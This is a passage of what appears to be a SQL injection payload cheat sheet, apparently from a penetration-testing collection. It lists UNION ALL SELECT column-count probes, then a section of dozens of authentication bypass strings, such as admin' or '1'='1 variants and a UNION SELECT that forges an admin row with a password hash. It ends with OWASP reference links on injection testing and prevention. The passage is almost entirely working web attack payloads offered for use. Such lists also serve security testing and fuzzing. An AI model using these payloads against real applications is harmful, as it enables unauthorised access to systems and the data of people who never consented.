786 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14--
787 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15--
788 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--
789 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
790 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
791 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
792 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
793 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
794 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--
795 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
796 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
797 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--
798 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
799 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
800 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
801 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--
802 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
803 | UNION ALL SELECT 'INJ'||'ECT'||'XXX'#
804 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2#
805 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3#
806 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4#
807 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5#
808 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6#
809 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7#
810 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8#
811 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9#
812 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10#
813 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11#
814 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12#
815 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13#
816 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14#
817 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15#
818 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16#
819 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17#
820 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#
821 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#
822 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#
823 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#
824 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#
825 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#
826 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#
827 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#
828 | ```
829 |
830 | #### SQL Injection Auth Bypass Payloads
831 |
832 | ```
833 | '-'
834 | ' '
835 | '&'
836 | '^'
837 | '*'
838 | ' or ''-'
839 | ' or '' '
840 | ' or ''&'
841 | ' or ''^'
842 | ' or ''*'
843 | "-"
844 | " "
845 | "&"
846 | "^"
847 | "*"
848 | " or ""-"
849 | " or "" "
850 | " or ""&"
851 | " or ""^"
852 | " or ""*"
853 | or true--
854 | " or true--
855 | ' or true--
856 | ") or true--
857 | ') or true--
858 | ' or 'x'='x
859 | ') or ('x')=('x
860 | ')) or (('x'))=(('x
861 | " or "x"="x
862 | ") or ("x")=("x
863 | ")) or (("x"))=(("x
864 | or 1=1
865 | or 1=1--
866 | or 1=1#
867 | or 1=1/*
868 | admin' --
869 | admin' #
870 | admin'/*
871 | admin' or '1'='1
872 | admin' or '1'='1'--
873 | admin' or '1'='1'#
874 | admin' or '1'='1'/*
875 | admin'or 1=1 or ''='
876 | admin' or 1=1
877 | admin' or 1=1--
878 | admin' or 1=1#
879 | admin' or 1=1/*
880 | admin') or ('1'='1
881 | admin') or ('1'='1'--
882 | admin') or ('1'='1'#
883 | admin') or ('1'='1'/*
884 | admin') or '1'='1
885 | admin') or '1'='1'--
886 | admin') or '1'='1'#
887 | admin') or '1'='1'/*
888 | 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
889 | admin" --
890 | admin" #
891 | admin"/*
892 | admin" or "1"="1
893 | admin" or "1"="1"--
894 | admin" or "1"="1"#
895 | admin" or "1"="1"/*
896 | admin"or 1=1 or ""="
897 | admin" or 1=1
898 | admin" or 1=1--
899 | admin" or 1=1#
900 | admin" or 1=1/*
901 | admin") or ("1"="1
902 | admin") or ("1"="1"--
903 | admin") or ("1"="1"#
904 | admin") or ("1"="1"/*
905 | admin") or "1"="1
906 | admin") or "1"="1"--
907 | admin") or "1"="1"#
908 | admin") or "1"="1"/*
909 | 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
910 | ```
911 |
912 | #### References :
913 |
914 | * SQL Injection ( OWASP )
915 |
916 | 👉 https://www.owasp.org/index.php/SQL_Injection
917 |
918 | * Blind SQL Injection
919 |
920 | 👉 https://www.owasp.org/index.php/Blind_SQL_Injection
921 |
922 | * Testing for SQL Injection (OTG-INPVAL-005)
923 |
924 | 👉 https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005)
925 |
926 | * SQL Injection Bypassing WAF
927 |
928 | 👉 https://www.owasp.org/index.php/SQL_Injection_Bypassing_WAF
929 |
930 | * Reviewing Code for SQL Injection
931 |
932 | 👉 https://www.owasp.org/index.php/Reviewing_Code_for_SQL_Injection
933 |
934 | * PL/SQL:SQL Injection
935 |
936 | 👉 https://www.owasp.org/index.php/PL/SQL:SQL_Injection
937 |
938 | * Testing for NoSQL injection
939 |
940 | 👉 https://www.owasp.org/index.php/Testing_for_NoSQL_injection
941 |
942 | * SQL Injection Injection Prevention Cheat Sheet
943 |
944 | 👉 https://cheatsheetseries.owasp.org/cheatsheets/Injection_Prevention_Cheat_Sheet.html
945 |
946 | * SQL Injection Query Parameterization Cheat Sheet
947 |
948 | 👉 https://cheatsheetseries.owasp.org/cheatsheets/Query_Parameterization_Cheat_Sheet.html
949 |
--------------------------------------------------------------------------------